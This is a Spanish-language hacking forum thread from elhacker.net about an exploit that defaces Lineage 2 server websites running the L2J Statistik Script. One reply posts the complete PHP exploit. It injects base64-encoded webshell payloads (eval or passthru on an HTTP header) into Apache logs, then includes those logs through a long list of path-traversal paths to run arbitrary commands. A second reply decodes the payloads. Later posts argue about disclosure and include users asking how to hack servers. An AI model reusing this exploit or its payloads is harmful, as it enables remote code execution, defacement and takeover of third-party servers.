Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: codebreak en 2 Enero 2007, 01:28 am


Título: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 2 Enero 2007, 01:28 am
Esop, es un video-tutorial que muestra como "hackear" o defacear webs de Lineage 2, que usen servidores L2J.

La gran mayoría de los servidores de Lineage 2 L2J, ya sean tanto caseros como de comunidades, utilizan el portal "L2J Statistik Script".  Es mas, todos los packs listos (con apache + mysql + server l2j) incluyen dicha web.. asi que no es raro encontrar este tipo de webs en servers L2J.

Acá se muestra la ejecución del exploit para este tipo de webs.

El exploit lo pueden descargar desde aca:
http://rapidshare.com/files/5656195/cb.zip.html
http://rapidshare.com/files/5656403/cb-diskw.zip.html
(Siento mucho que sean .exe, pero el codigo fuente no es "publico" aun. Esto debido a que las ultimas 2 utilidades que hice, alguien cambio los creditos y lo subio a su sitio y otros sitios de seguridad a su nombre)


Ver Video (http://www32.brinkster.com/pcreboot/videos.htm)

Saludos, ::)

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: sch3m4 en 2 Enero 2007, 03:05 am
seguro k él no publicó "su" código ;)

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 2 Enero 2007, 04:10 am
Cita de: Lympex en  2 Enero 2007, 03:05 am
seguro k él no publicó "su" código ;)

Bueno en todo caso el video y el exploit los hice yo.
Y si, publique "mi" codigo.. pero en ninguno de los foros donde antes habia publicado los otros (este inclusive).. pues en aquellos.. me plagiaron.

Dentro de todo es "mi" codigo, aunque el exploit esta basado en otros.. la vulnerabilidad la encontre yo y el exploit fue mejorado para que sea mas completo que aquellos exploits "originales".

Saludos,  ;)

Atte
Chico AKA Codebreak

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Critical Hit en 4 Enero 2007, 13:22 pm
Pues sin un código fuente por delante no pienso ejecutar eso en mi PC.

Buena suerte.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 4 Enero 2007, 16:02 pm
Cita de: Critical Hit en  4 Enero 2007, 13:22 pm
Pues sin un código fuente por delante no pienso ejecutar eso en mi PC.

Buena suerte.

Soy usuario de este foro hace ya un par de años... y no seria capaz de enviarles un archivo infectado.

El exploit lo hice yo, lo subí yo y les digo que no tiene nada. De todos modos, si lo quieres ejecutar o no, me es indiferente.. puesto que puedes ver su funcionamiento en el video.. y este post es meramente para compartir información y posterior prevención, no para forzar su aplicacion.

Saludos,

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Conemrad en 4 Enero 2007, 21:53 pm
los exploits los detecta como virus

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 5 Enero 2007, 02:01 am
Cita de: Conemrad en  4 Enero 2007, 21:53 pm
los exploits los detecta como virus

Creo que esa es una información un poco general.
No me extrañaría que un antivirus lo detecte como exploit o archivo malicioso, como sucede normalmente con cualquier herramienta similar.

Como virus?. Que virus?.
Por favor adjunta una captura del mensaje.

Saludos,

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: SergioDS en 5 Enero 2007, 02:28 am
nose si fiarme, men puedes poner en tu codigo algo cifrado en base 64 por ejemplo y que te de el credito ati, eso no lo suelen quitar, esque no soy partidario de los .exe sin fuente

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: EvilGoblin en 5 Enero 2007, 13:13 pm
C:\>diskw.exe
Acceso denegado.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: EvilGoblin en 5 Enero 2007, 13:22 pm
Citar
<?

print '
 |    ___ \      | \ \        /    |             ____|            |      _) |   
 |       ) |     |  \ \  \   / _ \ __ \          __| \ \  / __ \  |  _ \  | __|
 |      __/  \   |   \ \  \ /  __/ |   | _____|  |    `  <  |   | | (   | | |   
_____|_____|\___/     \_/\_/ \___|_.__/         _____|_/\_\ .__/ _|\___/ _|\__|
                                                           _|                   
             __ )\ \   /
             __ \ \   / 
             |   |   |   
            ____/   _|   
         
        ___|           |      |                    |   
       |      _ \   _` |  _ \ __ \   __| _ \  _` | |  /
       |     (   | (   |  __/ |   | |    __/ (   |   < 
      \____|\___/ \__,_|\___|_.__/ _|  \___|\__,_|_|\_\  Rev.4

   
      ~ [ www.codebreak.tk - codebreak1984@gmail.com] ~
 

         Application: L2J Statistik Script  <= v0.09

       works with register_globals=On & magic_quotes=off


Exploit by: Codebreak (a.k.a Chico)
Contact: codebreak1984@gmail.com
';

if ($argc<5) {
print_r('
-----------------------------------------------------------------------------
Usage: cb.exe -type host path cmd
type:
 -shell    Execute shell commands.
 -php      Execute PHP code.
host:      target server (ip or hostname)
path:      Statistik Script path
cmd:       shell command (ls -la, dir, etc..) or php code.
Options:
 -p[port]:    specify a port (default 80)
 -P[ip:port]: specify a proxy:port
Example:
 '.$argv[0].' www.l2jserver.com / ls -la -P1.1.1.1:80
 '.$argv[0].' www.gamingsite.com /lineage2/ dir
-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$cb=$argv[1];
$host=$argv[2];
$path=$argv[3];
$cmd="";

$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($cb=="-php")
{
$plop = "php";
$breaker = base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspOyBpbmlfc2V0KG1heF9leGVjdXRpb25fdGltZSwwKTsgaWYoaXNzZXQoJF9TRVJWRVJbSFRUUF9IT0xBXSkpeyAgICRwaHAgPSBnZXRfbWFnaWNfcXVvdGVzX2dwYygpPyBzdHJpcHNsYXNoZXMoJF9TRVJWRVJbSFRUUF9IT0xBXSk6JF9TRVJWRVJbSFRUUF9IT0xBXTsgZXZhbCgkcGhwLlwiO1wiKTsgfSBkaWU7ID8+");
}
if ($cb=="-shell")
{
$plop = "shell";
$breaker = base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspO2luaV9zZXQobWF4X2V4ZWN1dGlvbl90aW1lLDApOyBwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hPTEFdKTsgZGllOyA/Pg==");
}
echo "Poisoning Files ...\r\n\r\n";


$p3="".$p2."index.php?page=".$breaker."";

$packet="GET ".$p3.$breaker." HTTP/1.0\r\n";
$packet.="User-Agent: ".$breaker." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
sleep(3);

echo "Searching vulnerable files ...\n";
$packet ="POST ".$p."/index.php?page=stat.php&step=clan&search=".$breaker." HTTP/1.0\r\n";
$packet.="User-Agent: ".$breaker."\r\n";
$packet.="CLIENT-IP: ".$breaker."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
if (strstr($html,"codebreak"))
{
$temp=explode("codebreak",$html);
die($temp[1]);
}



echo "";
$pakiet="GET ".$p.$breaker." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
sleep(1);

$paths= array (
"access.log"
);

for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "";
$packet ="GET ".$p."index.php?page=../".$paths[$i]." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"codebreak"))
{
$temp=explode("codebreak",$html);
die($temp[1]);
}
}
$include= array (
"index.php"
);


$paths= array (
"../../../../../../usr/local/Apache2/logs/error.log",
"../../../../../../usr/local/Apache2/logs/access.log",
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../usr/local/apache2/logs/access_log",
"../../../../../usr/local/apache2/logs/access.log",
"../../../../../var/log/apache2/access_log",
"../../../../../var/log/apache2/access.log",
"../../../../../usr/local/apache2/logs/error_log",
"../../../../../usr/local/apache2/logs/error.log",
"../../../../../var/log/apache2/error_log",
"../../../../../var/log/apache2/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

for ($i=0; $i<=count($paths)-1; $i++)
for ($l=0; $l<=count($include)-1; $l++)
{
{
$b=$l+2;
echo " Poisoned file?...[".$plop."]\n";
$packet ="GET ".$p."".$include[$l]."?page=".$paths[$i]." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);

if (strstr($html,"codebreak"))
{
echo "\r\n\r\n\r\n\r\nExploit succeeded....\r\n\r\n\r\n\r\n";
$temp=explode("codebreak",$html);
die($temp[1]);
}
}
}
echo "Exploit Failed. Possibly register_globals off or magic_quotes on\r\n";
echo "codebreak1984@gmail.com\r\n";
echo "www.codebreak.tk\r\n";

// Based in Kacper LFI codes.
?>

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Isirius en 5 Enero 2007, 13:25 pm
Au aqui tenemos el code si era cuestion de tiempo como siempre.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Bebbop en 5 Enero 2007, 14:00 pm
Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo tambien sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????

Código:
base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspOyBpbmlfc2V0KG1heF9leGVjdXRpb25fdGltZSwwKTsgaWYoaXNzZXQoJF9TRVJWRVJbSFRUUF9IT0xBXSkpeyAgICRwaHAgPSBnZXRfbWFnaWNfcXVvdGVzX2dwYygpPyBzdHJpcHNsYXNoZXMoJF9TRVJWRVJbSFRUUF9IT0xBXSk6JF9TRVJWRVJbSFRUUF9IT0xBXTsgZXZhbCgkcGhwLlwiO1wiKTsgfSBkaWU7ID8+");


<?php 
  ob_clean(); 
  echo(codebreak); 
  ini_set(max_execution_time,0); 
  if(isset($_SERVER[HTTP_HOLA])){ 
   $php = get_magic_quotes_gpc()?stripslashes($_SERVER[HTTP_HOLA]):$_SERVER[HTTP_HOLA]; 
   eval($php.\";\"); 
  } 
  die; 
?>

base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspO2luaV9zZXQobWF4X2V4ZWN1dGlvbl90aW1lLDApOyBwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hPTEFdKTsgZGllOyA/

Código:
<?php 
  ob_clean(); 
  echo(codebreak); 
  ini_set(max_execution_time,0); 
  passthru($_SERVER[HTTP_HOLA]); 
  die; 
?>

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: EvilGoblin en 5 Enero 2007, 15:13 pm
El programa no puedo ejecutarlo desde el FUCKING windows XP de mi trabajo =P xD


asi q ^^ llego a casa y lo hago desde Back-Track =P


=) keria ver el Source ^^ para estar seguro =D

Muy buena idea!!! ^^

Buen aporte =)

Seguire de serca tus post en este foro ^^ en izhal y en elantro xD

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 5 Enero 2007, 19:16 pm
Cita de: Bebbop en  5 Enero 2007, 14:00 pm
Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo también sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????


Bueno, si colocan el código ahi me da lo mismo. La cosa es que el trabajo de buscarlo al menos no lo hago yo.

A ver.. Quien me sorprende eres tu.
Te has puesto TU en contacto CONMIGO para saber si avise sobre el bug?.. NO. Estas hablando SIN SABER.

Me puse en contacto con los creadores de los principales packs que incluyen el script (Hero1711, Panter, L2j Dev, etc...) antes de hacer publico el exploit... asi que todo lo que dices no tiene sentido.

Y te crees muy experto por poder decodificar el base64 del exploit???, ajajajaj. No creas que me vas a venir a  impresionar cuando lo único que haces, es decodificar y encontrar algo que yo hice ajaja. Están en base64 para mayor comodidad, no para ocultar algo... de hecho me impresionaría unicamente si no lo puedes decodificar.

Era tan fácil encontrar el exploit como buscar su nombre en google e ingresar a la primera pagina que aparece listada, pues el source lo publique en la comunidad W4cking y en ningun otro lado. Asi que no te des merito.

Saludos,

PS: Uno de los casos del plagio lo puedes ver aca... para que por un minuto entiendas y respetes la opinion de los demás de publicar o no información. Te repito.. yo me comunique con distintos admins y creadores asi que porfavor, para de hacer afirmaciones sin fundamentos. Incluso, el video mismo fue hecho para que los admins que no consideraban peligroso el exploit tomen conciencia.

Original:
http://usuarios.lycos.es/changoleoni/cbreak.txt
Plagio:
http://decadence.inc.md/%5B-%20PHP%20Shells/utool.html

Parecidos??.
El ultimo  se hizo famoso y el primero (el original) paso al recuerdo.

En todo caso.. cree 2 exploits mas, para los dos sripts mas usados.. y ellos no han sido publicados. Dependera de que sucede con este exploit.. sin embargo.. ya avise su error a muchos admins. Pero supongo tu ya sabes eso no?, que pareces saber tanto sobre mi y lo que hago como para poder venirme a  juzgar.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: CrackBubledMind en 6 Enero 2007, 02:29 am
es terible que veamos esto en esta comu, pero amigo yo te entiendo lo que dices, y se que se siente que te roben un fuente y se hagan famoso a costa de algo tuyo, cuidate chico, cuidado con el gran hermano(papa noel) jajajaja

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Bebbop en 7 Enero 2007, 23:29 pm
No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).


Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: codebreak en 8 Enero 2007, 06:55 am
Cita de: Bebbop en  7 Enero 2007, 23:29 pm
No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).



No me reía de como tiraban abajo servidores.
Me reía del hecho de que a la semana de publicar un exploit, ya había un video de un grupo hacker de holanda que hacia uso de mi exploit para tirar 7 servidores en 30 minutos.

Que es lo gracioso?, el ver servidores abajo?. NO... el ver un video sobre mi exploit siendo explicado en un idioma casi ilegible. En todo caso, me puse en contacto con ellos para darles mi opinión.. pero denuevo digo:  estas asumiendo cosas y comentando fundándote en ellas.

En ragezone, no fui yo quien coloco la advertencia sino un amigo que es admin de servidores y le dije que lo coloque en el lugar que estime sea mas conveniente. Si no lo ves en el foro oficial de l2j fue para no publicitarlo... fue todo por pm. Principalmente porque?, pq el exploit no va a la versión 0.01 publicada ahi (la que tu advertiste), sino a la versión modificada y unida con ACM.

Saludos,

PS: Por algo la versión publicada en elantro esta protegida con contraseña. Si mi intención fuese el daño, seria estúpido hacer eso.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: ANELKAOS en 9 Enero 2007, 01:29 am
Haya paz chicos. chico es libre de seguie el "Full Disclosure" si le parece bien, a mi no me parece bien, solo es mi opinión personal, encuentro las cosas, las notifico si me afectan o me parecen graves y "nadie" se entera. Los desarrolladores tienen la obligación estar al día en las vulnerabilidades de su soft  revisando las listas de seguridad ya que son ellos quienes mejor lo conocen (o deberian conocer) pero no por ello se le pude reprochar a nadie que no notifique. ¿Cuantas vulnerabilidades existen sin reportarse? ¿Cuantos 0-days teneis cada uno de vosotros en la manga? Si nos ponemos a hacer de consultores gratuitamente hundimos el mercado de la seguridad  :D

Ademas un mundo perfecto no seria tan divertido jeje

PD: Bebbop me alegra verte por aquí :)

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Bebbop en 10 Enero 2007, 11:39 am
En eso te doy la razon, cada uno es libre de hacerlo como quiera, ahora revisando lo que he escrito veo que no he sido muy "cortes" (siempre peco de eso :P)

Por cierto, he visto que se ha publicado en la listas de seguridad.

pd.: hace mucho tiempo que visito el foro pero siempre ha sido en "modo bot"... por cierto, no sabia que tenias blog... me he enterado atraves del blog de Chema.




Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: CrashIIX en 8 Junio 2007, 21:03 pm
Alguien tiene el video ???

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: alienmaster en 12 Junio 2008, 17:04 pm
yo apoyo totalmente a codebreak, le conozco del msn de hace un tiempo ya y es muy bueno en lo suyo

Saludos

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: 5n4K3 en 4 Agosto 2008, 15:56 pm
jajajajaaj tenia una shell xD era obvio :p revisen bien lo que usan xD no crean nada de 'plagios' y demas mierdas...si el codigo es cerrado, es porque algo siempre ocultan :p

pd: hace mucho que no entraba :D

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: Eazy en 19 Agosto 2008, 04:51 am
Flaco, si no queres que te plagien el xploit, ni queres que te roben el code.
pq no aprovechas lo que vos descubris y lo usas para tus beneficios? no creo que tengas que demostrarle a nadie " ui que hacker que soy " ...yo se que para hacer ese codigo vos sabes demasiado  ;)
por lo de evil, esta muy mal no respetar la opinion de codebreak de no expresar su codigo pero bleh, no peleen es al pedo.

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: zeroforce en 1 Abril 2009, 20:39 pm
bueno, leyendo un poco de todo...veo que se trunca un poco la etica con la razon....solo les recomiendo un poco mas de discrepcion con lo que se hace y se dice por ahi....felicito al desarrollador del xploit...muy interesante, y como dicen por ahi arriba...los admin tienen que estar pendientes de lo que tienen, y no dormirsen...porque si no la llevan....exitos a todos

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: N1P3X en 1 Abril 2009, 23:29 pm
buen aporte loco saludos

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: josevi88 en 26 Abril 2011, 17:44 pm
xD e entrado a esta web ace poco jaja y me gustaria saber Hackear servers de L2 alguien me podria ayudar por favor?? (el link del video esta caido por eso pido ayuda)
Gracias de antemano ;) .

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: isver en 16 Mayo 2011, 07:00 am
Hola amigo . podria por favor poner el video. sale error en el enlace del video . y me gustaria verlo. descargue el exploit y no entiendo como funciona . trate de usarlo pero no e podido lograr q funcione. estoy entrando enel mundo de la informatica y soynuevo en ello . apenas tengo un año en esto y quisiera proteger mi server de l2 contra muchas cosas. espero arregle el video para verlo . cuidese mucho y saludos

Título: Re: Hackeando webs de Lineage 2 - video
Publicado por: WHK en 20 Mayo 2011, 21:48 pm
Podrían leer un poco mejor el primer post y darse cuenta que es del año 2007? claramente los links a estas alturas deben estar todos rotos y codebreak hace años que no lo veo en ningún foro.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines